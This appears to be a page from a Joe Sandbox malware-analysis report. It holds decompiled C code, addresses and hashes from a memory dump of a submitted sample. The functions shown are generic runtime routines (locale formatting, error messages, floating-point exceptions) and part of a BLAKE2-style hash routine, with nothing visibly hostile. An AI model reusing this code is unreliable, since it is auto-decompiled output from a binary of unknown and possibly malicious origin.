0x0008cd15
0x0008cd15
0x0008cd15
0x0008cce3
0x0008cce8
0x0008ccee
0x0008ccee
0x0008ccf1
0x0008ccf3
0x0008ccf5
0x00000000
0x00000000
0x0008ccf7
0x0008ccf8
0x0008ccfb
0x0008ccfe
0x0008cd00
0x00000000
0x0008cd02
0x00000000
0x0008cd02
0x00000000
0x0008cd00
0x0008cd04
0x0008cd0b
0x0008cd0f
0x0008cd13
0x00000000
0x00000000
0x0008cd13
0x0008cd16
0x0008cd16
0x0008cd18
0x0008cd25
0x0008cd28
0x0008cd2b
0x0008cd2e
0x0008cd2e
0x0008cd32
0x0008cd35
0x0008cd38
0x0008cd3b
0x0008cd46
0x0008cd3d
0x0008cd42
0x0008cd42
0x0008cd50
0x0008cd55
0x0008cd58
0x0008cd5a
0x0008cd64
0x0008cd67
0x0008cd6e
0x0008cd71
0x0008cd74
0x0008cd7c
0x0008cd82
0x0008cd82
0x0008cd82
0x0008cd82
0x0008cd74
0x0008cd87
0x0008cd8e
0x0008cd8e
0x0008cd91
0x0008cd94
0x0008cfc6
0x0008cfc6
0x0008cd9a
0x0008cd9a
0x0008cda0
0x0008cda3
0x0008cda6
0x0008cda9
0x0008cdac
0x0008cdaf
0x0008cdb2
0x0008cdb2
0x0008cdb5
0x0008cdbc
0x0008cdbc
0x0008cdb7
0x0008cdb7
0x0008cdb7
0x0008cdbe
0x0008cdc2
0x0008cdc5
0x0008cdc7
0x0008cdca
0x0008cdd1
0x0008cdd4
0x0008cdd7
0x0008cde2
0x0008cde5
0x0008cdea
0x0008cdef
0x0008cdf6
0x0008cdfb
0x0008cdfd
0x0008cdff
0x0008ce03
0x0008ce06
0x0008ce09
0x0008ce11
0x0008ce1a
0x0008ce1a
0x0008ce1c
0x0008ce1f
0x0008ce1f
0x0008ce09
0x0008ce29
0x0008ce2e
0x0008ce33
0x0008ce35
0x0008ce38
0x0008ce3a
0x0008ce3d
0x0008ce40
0x0008ce42
0x0008ce45
0x0008ce48
0x0008ce4a
0x0008ce51
0x0008ce56
0x0008ce59
0x0008ce63
0x0008ce65
0x0008ce67
0x0008ce6a
0x0008ce6a
0x0008ce6c
0x0008ce6f
0x0008ce72
0x0008ce75
0x0008ce78
0x0008ce4c
0x0008ce4c
0x0008ce4f
0x00000000
0x00000000
0x0008ce4f
0x0008ce7b
0x0008ce7d
0x0008ce7f
0x00000000
0x0008ce81
0x0008ce81
0x0008ce84
0x0008ce86
0x0008ce86
0x0008ce94
0x0008ce97
0x0008ce9c
0x0008ce9e
0x00000000
0x00000000
0x0008cea0
0x0008cea7
0x0008cea7
0x0008ceaa
0x0008cead
0x0008ceb0
0x0008ceb3
0x0008ceb3
0x0008ceb6
0x0008ceb9
0x0008cebd
0x0008cec0
0x0008cec2
0x0008cec5
0x00000000
0x00000000
0x0008cec7
0x0008cec5
0x0008cea2
0x0008cea2
0x0008cea5
0x00000000
0x00000000
0x00000000
0x00000000
0x0008cea5
0x0008cecc
0x0008cecc
0x00000000
0x0008cecc
0x0008cec9
0x00000000
0x0008cec9
0x0008ce84
0x0008ce7f
0x0008cecf
0x0008cecf
0x0008ced1
0x0008cedb
0x0008cedb
0x0008cede
0x0008cee0
0x0008cee2
0x0008cee4
0x0008cee9
0x0008ceec
0x0008ceec
0x0008ceef
0x0008cef2
0x0008cef5
0x0008cef7
0x0008cf0c
0x0008cf0e
0x0008cf10
0x0008cf12
0x0008cf14
0x0008cf16
0x0008cf18
0x0008cf1a
0x0008cf1d
0x0008cf1d
0x0008cf21
0x0008cf23
0x0008cf29
0x0008cf2c
0x0008cf2c
0x0008cf2c
0x0008cf30
0x0008cf30
0x0008cf35
0x0008cf38
0x0008cf38
0x0008cf3d
0x0008cf3f
0x0008cf41
0x0008cf48
0x0008cf48
0x0008cf4a
0x0008cf4f
0x0008cf51
0x0008cf54
0x0008cf54
0x0008cf57
0x0008cf60
0x0008cf60
0x0008cf62
0x0008cf62
0x0008cf67
0x0008cf6d
0x0008cf71
0x0008cf74
0x0008cf77
0x0008cf79
0x0008cf79
0x0008cf79
0x0008cf7e
0x0008cf7e
0x0008cf81
0x0008cf84
0x0008cf43
0x0008cf43
0x0008cf46
0x00000000
0x00000000
0x0008cf46
0x0008cf41
0x0008cf8b
0x0008cf8b
0x0008cf8c
0x0008ced3
0x0008ced3
0x0008ced5
0x00000000
0x00000000
0x0008ced5
0x0008cf9c
0x0008cfa1
0x0008cfa4
0x0008cfa8
0x0008cfa9
0x0008cfac
0x0008cfaf
0x0008cfb0
0x0008cfb3
0x0008cfb6
0x0008cfb9
0x0008cfbc
0x0008cfbc
0x0008cfc4
0x0008cfcb
0x0008cfcc
0x0008cfce
0x0008cfd0
0x0008cfd2
0x0008cfd5
0x0008cfe0
0x0008cfe0
0x0008cfe6
0x0008cfe6
0x0008cfe9
0x0008cfea
0x0008cfea
0x0008cfe0
0x0008cfee
0x0008cff0
0x0008cff2
0x0008cff4
0x0008cff4
0x0008cff6
0x0008cffa
0x00000000
0x00000000
0x0008cffc
0x0008cffc
0x0008cfff
0x0008d001
0x00000000
0x00000000
0x00000000
0x0008d001
0x0008cff4
0x0008d003
0x0008d00d
0x00000000
0x00000000
0x00000000
0x0008cd18
0x0008cba2
0x0008cba2
0x0008cba2
0x0008cba5
0x0008cba8
0x0008cbab
0x0008cbdc
0x0008cbde
0x0008cc29
0x0008cc2b
0x0008cc32
0x0008cc39
0x0008cc3c
0x0008cc3f
0x0008cc45
0x0008cc45
0x0008cc46
0x0008cc49
0x0008cc50
0x0008cc59
0x0008cc5e
0x0008cc61
0x0008cc66
0x0008cc69
0x0008cc6b
0x0008cc70
0x0008cc73
0x0008cc76
0x0008cc76
0x0008cc76
0x0008cc7a
0x0008cc7d
0x0008cc7d
0x0008cc82
0x0008cc82
0x0008cc8d
0x0008cc98
0x0008cc98
0x0008cc9b
0x0008cca7
0x0008ccac
0x0008ccb7
0x0008ccb9
0x0008ccbb
0x0008ccc1
0x0008ccc6
0x0008ccc8
0x0008ccce
0x0008cbe0
0x0008cbec
0x0008cbec
0x0008cbef
0x0008cbff
0x0008cc05
0x0008cc0c
0x0008cc0e
0x0008cc16
0x0008cc18
0x0008cc1a
0x0008cc1f
0x0008cc22
0x0008cc28
0x0008cc28
0x0008cbad
0x0008cbb0
0x0008cbb4
0x0008cbba
0x0008cbc9
0x0008cbd3
0x0008cbdb
0x0008cbdb
0x0008cbab
0x0008cb86
0x0008cb89
0x0008cb8f
0x0008cb8f
0x0008cb75
0x0008cb7b
0x0008cb7b

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction ID: 9096020f280ad27b48b1ddeade394dcbce24f4d0febaad721c88c6a96850012a
Opcode Fuzzy Hash: 3f40ebe10d214b85774591126f504afcb75e73f030a81f23e755a653bb72e8d1
Instruction Fuzzy Hash: D4022C71E002199BEF14DFA9C880AADBBF1FF48314F25816AE959E7385D731AD41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0007A63C Relevance: 3.0, APIs: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0007A63C(intOrPtr _a4, intOrPtr _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0x9e610 == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xbeca8 = _v304;
					 *0xbecaa = 0;
					 *0x9e610 = 0xbeca8;
				}
				E0006FD25(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0x9e600, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}

0x0007a654
0x0007a662
0x0007a66f
0x0007a677
0x0007a67d
0x0007a67d
0x0007a693
0x0007a698
0x0007a69d
0x0007a6a7
0x0007a6b1
0x0007a6b9
0x0007a6c4

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0007A662
GetNumberFormatW.KERNEL32 ref: 0007A6B1

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: a5cf01d051910328bf7603ea619184c26ec066ce0aec403852b81666735a609b
Instruction ID: 1b7bd50e904e029f2a6efc8962b29ea237325acea2982c4cd4bc48f7ef5a48c0
Opcode Fuzzy Hash: a5cf01d051910328bf7603ea619184c26ec066ce0aec403852b81666735a609b
Instruction Fuzzy Hash: 15015A36600248BAEB10CFA4EC05FEB7BBCFF19710F005522BA0897160D3749A258BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00066EC9 Relevance: 3.0, APIs: 2, Instructions: 17
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00066EC9(WCHAR* _a4, long _a8) {
				long _t3;
				signed int _t5;

				_t3 = GetLastError();
				if(_t3 == 0) {
					return 0;
				}
				_t5 = FormatMessageW(0x1200, 0, _t3, 0x400, _a4, _a8, 0);
				asm("sbb eax, eax");
				return  ~( ~_t5);
			}

0x00066ec9
0x00066ed1
0x00000000
0x00066ef8
0x00066eea
0x00066ef2
0x00000000

APIs

GetLastError.KERNEL32(0007117C,?,00000200), ref: 00066EC9
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00066EEA

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 124329026b5693b71713cc0d30763fcfae53517045851eac06e19f7d57df8fe8
Instruction ID: 02f347354cb7f78e5a8b84186f1ac813155103fe07136ac7b167fd5f3fca65c1
Opcode Fuzzy Hash: 124329026b5693b71713cc0d30763fcfae53517045851eac06e19f7d57df8fe8
Instruction Fuzzy Hash: 68D0C9353C8302BFFB610A75CC06F2B7BA5B795B82F208515B356E90E0CA729424DA29

Uniqueness

Uniqueness Score: -1.00%

Function 00091194 Relevance: 1.8, APIs: 1, Instructions: 269
COMMONLIBRARYCODECrypto

Download Yara Rule

C-Code - Quality: 100%

			E00091194(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
				signed int _t172;
				signed int _t175;
				signed int _t178;
				signed int* _t179;
				signed int _t195;
				signed int _t199;
				signed int _t202;
				void* _t203;
				void* _t206;
				signed int _t209;
				void* _t210;
				signed int _t225;
				unsigned int* _t240;
				signed char _t242;
				signed int* _t250;
				unsigned int* _t256;
				signed int* _t257;
				signed char _t259;
				long _t262;
				signed int* _t265;

				 *(_a4 + 4) = 0;
				_t262 = 0xc000000d;
				 *(_a4 + 8) = 0;
				 *(_a4 + 0xc) = 0;
				_t242 = _a12;
				if((_t242 & 0x00000010) != 0) {
					_t262 = 0xc000008f;
					 *(_a4 + 4) =  *(_a4 + 4) | 1;
				}
				if((_t242 & 0x00000002) != 0) {
					_t262 = 0xc0000093;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
				}
				if((_t242 & 0x00000001) != 0) {
					_t262 = 0xc0000091;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
				}
				if((_t242 & 0x00000004) != 0) {
					_t262 = 0xc000008e;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
				}
				if((_t242 & 0x00000008) != 0) {
					_t262 = 0xc0000090;
					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
				}
				_t265 = _a8;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
				_t259 = E0008EAF2(_a4);
				if((_t259 & 0x00000001) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
				}
				if((_t259 & 0x00000004) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
				}
				if((_t259 & 0x00000008) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
				}
				if((_t259 & 0x00000010) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
				}
				if((_t259 & 0x00000020) != 0) {
					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
				}
				_t172 =  *_t265 & 0x00000c00;
				if(_t172 == 0) {
					 *_a4 =  *_a4 & 0xfffffffc;
				} else {
					if(_t172 == 0x400) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffd | 1;
						L26:
						 *_t257 = _t225;
						L29:
						_t175 =  *_t265 & 0x00000300;
						if(_t175 == 0) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
							L35:
							 *_t250 = _t178;
							L36:
							_t179 = _a4;
							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
							if(_a28 == 0) {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
								 *((long long*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t254 = _a4;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
								 *(_a4 + 0x50) =  *_t240;
							} else {
								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
								_t240 = _a24;
								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
								 *(_a4 + 0x50) =  *_t240;
							}
							E0008EA58(_t254);
							RaiseException(_t262, 0, 1,  &_a4);
							_t256 = _a4;
							if((_t256[2] & 0x00000010) != 0) {
								 *_t265 =  *_t265 & 0xfffffffe;
							}
							if((_t256[2] & 0x00000008) != 0) {
								 *_t265 =  *_t265 & 0xfffffffb;
							}
							if((_t256[2] & 0x00000004) != 0) {
								 *_t265 =  *_t265 & 0xfffffff7;
							}
							if((_t256[2] & 0x00000002) != 0) {
								 *_t265 =  *_t265 & 0xffffffef;
							}
							if((_t256[2] & 0x00000001) != 0) {
								 *_t265 =  *_t265 & 0xffffffdf;
							}
							_t195 =  *_t256 & 0x00000003;
							if(_t195 == 0) {
								 *_t265 =  *_t265 & 0xfffff3ff;
							} else {
								_t206 = _t195 - 1;
								if(_t206 == 0) {
									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
									L55:
									 *_t265 = _t209;
									L58:
									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
									if(_t199 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000300;
										L64:
										 *_t265 = _t202;
										L65:
										if(_a28 == 0) {
											 *_t240 = _t256[0x14];
										} else {
											 *_t240 = _t256[0x14];
										}
										return _t202;
									}
									_t203 = _t199 - 1;
									if(_t203 == 0) {
										_t202 =  *_t265 & 0xfffff3ff | 0x00000200;
										goto L64;
									}
									_t202 = _t203 - 1;
									if(_t202 == 0) {
										 *_t265 =  *_t265 & 0xfffff3ff;
									}
									goto L65;
								}
								_t210 = _t206 - 1;
								if(_t210 == 0) {
									_t209 =  *_t265 & 0xfffffbff | 0x00000800;
									goto L55;
								}
								if(_t210 == 1) {
									 *_t265 =  *_t265 | 0x00000c00;
								}
							}
							goto L58;
						}
						if(_t175 == 0x200) {
							_t250 = _a4;
							_t178 =  *_t250 & 0xffffffe7 | 0x00000004;
							goto L35;
						}
						if(_t175 == 0x300) {
							 *_a4 =  *_a4 & 0xffffffe3;
						}
						goto L36;
					}
					if(_t172 == 0x800) {
						_t257 = _a4;
						_t225 =  *_t257 & 0xfffffffe | 0x00000002;
						goto L26;
					}
					if(_t172 == 0xc00) {
						 *_a4 =  *_a4 | 0x00000003;
					}
				}
			}

0x000911a2
0x000911a9
0x000911ae
0x000911b4
0x000911b7
0x000911bd
0x000911c2
0x000911c7
0x000911c7
0x000911cd
0x000911d2
0x000911d7
0x000911d7
0x000911de
0x000911e3
0x000911e8
0x000911e8
0x000911ef
0x000911f4
0x000911f9
0x000911f9
0x00091200
0x00091205
0x0009120a
0x0009120a
0x00091212
0x00091222
0x00091234
0x00091246
0x00091259
0x0009126b
0x00091273
0x00091278
0x0009127d
0x0009127d
0x00091284
0x00091289
0x00091289
0x00091290
0x00091295
0x00091295
0x0009129c
0x000912a1
0x000912a1
0x000912a8
0x000912ad
0x000912ad
0x000912b7
0x000912b9
0x000912f3
0x000912bb
0x000912c0
0x000912e4
0x000912ec
0x000912e0
0x000912e0
0x000912f6
0x000912fd
0x000912ff
0x00091321
0x00091329
0x0009132c
0x0009132c
0x0009132e
0x0009132e
0x00091339
0x0009133f
0x00091344
0x0009134b
0x00091385
0x00091390
0x00091396
0x00091399
0x0009139c
0x000913a8
0x000913b0
0x0009134d
0x00091350
0x0009135c
0x00091362
0x00091368
0x0009136b
0x00091374
0x00091374
0x000913b3
0x000913c1
0x000913c7
0x000913ce
0x000913d0
0x000913d0
0x000913d7
0x000913d9
0x000913d9
0x000913e0
0x000913e2
0x000913e2
0x000913e9
0x000913eb
0x000913eb
0x000913f2
0x000913f4
0x000913f4
0x00091401
0x00091404
0x0009143b
0x00091406
0x00091406
0x00091409
0x00091434
0x00091429
0x00091429
0x0009143d
0x00091445
0x00091448
0x00091467
0x0009146c
0x0009146c
0x0009146e
0x00091473
0x0009147f
0x00091475
0x00091478
0x00091478
0x00091484
0x00091484
0x0009144a
0x0009144d
0x0009145c
0x00000000
0x0009145c
0x0009144f
0x00091452
0x00091454
0x00091454
0x00000000
0x00091452
0x0009140b
0x0009140e
0x00091424
0x00000000
0x00091424
0x00091413
0x00091415
0x00091415
0x00091413
0x00000000
0x00091404
0x00091306
0x00091314
0x0009131c
0x00000000
0x0009131c
0x0009130a
0x0009130f
0x0009130f
0x00000000
0x0009130a
0x000912c7
0x000912d5
0x000912dd
0x00000000
0x000912dd
0x000912cb
0x000912d0
0x000912d0
0x000912cb

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0009118F,?,?,00000008,?,?,00090E2F,00000000), ref: 000913C1

Memory Dump Source

Source File: 00000000.00000002.240154605.0000000000061000.00000020.00000001.01000000.00000003.sdmp, Offset: 00060000, based on PE: true

Associated: 00000000.00000002.240144198.0000000000060000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240205505.0000000000093000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240215483.000000000009E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240222374.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240232893.00000000000C1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240241100.00000000000C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60000_cDouNOFXle.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: c87f77452a18952b37f4c7b9e4d6ddab0e1c205b65a02e420553343ec548a8ef
Instruction ID: 722928d6d56580ff46d396eff903e7d5833cfad7db5c831fbcc8069e512db395
Opcode Fuzzy Hash: c87f77452a18952b37f4c7b9e4d6ddab0e1c205b65a02e420553343ec548a8ef
Instruction Fuzzy Hash: 4EB16F3161060ADFDB55CF28C486BA57BF0FF09364F258658E8A9CF2A1C335E992DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0006407E Relevance: 1.6, Strings: 1, Instructions: 332
COMMONCrypto

Download Yara Rule

C-Code - Quality: 81%

			E0006407E() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0x93680; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0x93681; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0x93682; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0x93683; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0x93684; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0x93685; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0x93686; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0x93687; // 0xa090807
					asm("ror ebp, 0xc");
